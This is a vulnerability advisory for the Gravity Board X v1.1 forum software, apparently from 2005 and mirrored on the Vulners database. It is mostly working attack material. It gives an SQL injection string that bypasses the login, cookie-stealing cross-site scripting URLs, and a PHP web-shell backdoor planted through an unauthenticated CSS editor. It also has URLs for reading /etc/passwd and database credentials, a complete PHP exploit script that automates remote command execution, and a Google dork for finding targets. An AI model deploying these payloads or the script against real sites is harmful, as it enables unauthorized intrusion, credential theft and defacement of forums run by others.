Vulners
Lucene search
gravityBad.txt
`4.22 07/08/2005
Gravity Board X v1.1 (possibly prior versions)
Remote code execution, SQL Injection / Login Bypass, cross site scripting, path
disclosure poc
software:
author site: http://www.gravityboardx.com/
a) Sql Injection / Login Bypass:
A user can bypass login check and grant administrator privileges on target
system:
login: ' or isnull(1/0) /*
password: whatever
b) Cross site scripting poc:
b.1)After he login as administrator he can edit template to insert evil javascript
code. Try to insert at the end of the template these lines:
</STYLE>
<script>alert(document.cookie)</script>
b.2)A user can craft a malicious url like this to access target user cookies:
http://[target]/[path]/deletethread.php?board_id="><script>alert(document.cookie)</script>
c) Remote commands/php code execution:
c.1) Editing the template, attacker can leave a backdoor in target system,
example, at the end of template:
</STYLE>
<?php
error_reporting(0); //to show no errors when page is called normally
system($HTTP_GET_VARS[cmd]);
?>
After, the attacker can launch commands by this urls:
http://[target]/[path]/index.php?cmd=ls%20-la
to list directories...
http://[target]/[path]/index.php?cmd=cat%20/etc/passwd
to see Unix /etc/passwd file
http://[target]/[path]/index.php?cmd=cat%20config.php
to see database username/password
c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling
editcss.php script, look at the code of this script:
if($fp = fopen('gbxfinal.css','w')){
fwrite($fp, $csscontent);
fclose($fp);
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php?action=admin">';
}else{
echo 'Gravity Board X was unable to save changes to the CSS template.';
}
a user can easily deface the forum and/or insert a backdoor calling an url like this:
http://[target]/[path]/editcss.php?csscontent=</style><?php%20system($HTTP_GET_VARS[cmd]);%20?>
then execute commands:
http://[target]/[path]/index?cmd=[command]
this my php exploit code, run it from Apache:
<?php
/* 4.22 07/08/2005
Gravity Board X v1.1 (possibly prior versions) remote code execution
by rgod
site: http://rgod.altervista.org
make these changes in php.ini if you have troubles
with this script:
allow_call_time_pass_reference = on
register_globals = on */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo '<head><title>Gravity Board X v1.1 remote commands execution</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {color: #00FF00;}
body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
font-style: italic;
}
-->
</style></head>
<body>
<p class="Stile6">Gravity Board X v1.1 (possibly prior versions) remote commands execution</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
<tr>
<td width="43%">
<form name="form1" method="post" action="'.$SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value">
<p>
<input type="text" name="host">
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>
<p>
<input type="text" name="path">
<span class="Stile5">path (ex: /flatnuke/forum/ or /forum/ just /) </span></p>
<p>
<input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value) </span></p>
<p>
<input type="text" name="command">
<span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>
<p>
<input type="text" name="proxy">
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>
<p>
<input type="submit" name="Submit" value="go!">
</p>
</form></td>
</tr>
</table>
</body>
</html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$htmli=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($htmli)==1) {echo "<td>0".$htmli."</td>";} else
{echo "<td>".$htmli."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
if ($proxy<>'')
{
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);
if ($c==0) {
echo 'check the proxy...<br>';
die;
}
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
//Gravity forum default template
$template='A:link, A:visited, A:active {
TEXT-DECORATION: none; COLOR: #E6B400;
}
A:hover {
TEXT-DECORATION: underline;
}
p {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: transparent;
}
body {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: #101010;
}
/* FONTS */
.headerfont {
FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #DCDCDC;
}
.headerfont2 {
FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
.categoryfont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
.mainlinkfont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #006699;
}
.navfont {
FONT-FAMILY: Arial; FONT-SIZE: 8pt; FONT-WEIGHT: bold; COLOR: #000000;
}
.navheader {
FONT-FAMILY: Tahoma; FONT-SIZE: 14pt; FONT-WEIGHT: bold; COLOR: #000000;
}
.profilefont {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px;
}
.small {
FONT-FAMILY: Verdana; FONT-SIZE: 10px;
}
.subjectfont {
FONT-FAMILY: Verdana; FONT-SIZE: 11px; COLOR: #006699;
}
.welcomefont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
/* MAIN TABLES */
.station {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #222222;
}
.main {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #181818;
}
.post {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 0px; BACKGROUND: #202020; BORDER-COLLAPSE: collapse;
}
/* OTHER */
.textbox {
COLOR: #FFFFFF; background: #606060; border: 1px inset #C0C0C0; font-size: 8pt; FONT-FAMILY: Verdana;
}
.button {
COLOR: #FFFFFF; BACKGROUND: #707070; FONT-FAMILY: Verdana; FONT-WEIGHT: bold; BORDER-STYLE: solid; BORDER-COLOR: #999999; BORDER-WIDTH: 2px;
}
/* TABLE CELLS */
.header {
BACKGROUND-IMAGE: url(images/skin/header_dark.gif);
}
.row1 {
BACKGROUND: #303030;
PADDING: 4px;
}
.row2 {
BACKGROUND: #202020;
PADDING: 4px;
}
.row3 {
BACKGROUND: #404040;
PADDING: 4px;
}
.floatrow {
BACKGROUND: #4A4A4A;
PADDING: 4px;
}
.rollover {
BACKGROUND: #808080;
PADDING: 4px;
CURSOR: hand;
}'; //setup new template
if ($port=='') {$port=80;}
$packet="GET ";
if ($proxy<>'') {$packet.="http://".$host;}
$packet.= $path."editcss.php?csscontent=".urlencode($template);
//cut next line to reset template...
$packet.= urlencode("</style><?php error_reporting(0);system(".'$HTTP_GET_VARS[cmd]'."); ?>");
$packet.=" HTTP/1.0\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
if (!$ock) {echo 'Not connected to target...'; die;}
//debugging...
show($packet);
fputs($ock,$packet);
fclose($ock);
$packet="GET ";
if ($proxy<>'') {$packet.="http://".$host;}
$packet.=$path."index.php?cmd=".urlencode($command)." HTTP/1.0\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
if (!$ock) {echo 'Not connected to target...'; die;}
//debugging...
show($packet);
fputs($ock,$packet);
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
fclose($ock);
echo "If Gravity Forum is unpatched and vulnerable, now you will see ".htmlentities($command)." output inside html...<br>";
echo nl2br(htmlentities($html));
}
?>
It's also possible to disclose path:
d) path disclosure:
http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path]/ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[target]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php
ans so on...calling scripts in /forms directory
googledork: "Powered by Gravity Board"
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://www.rgod.altervista.org/gravity.html
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4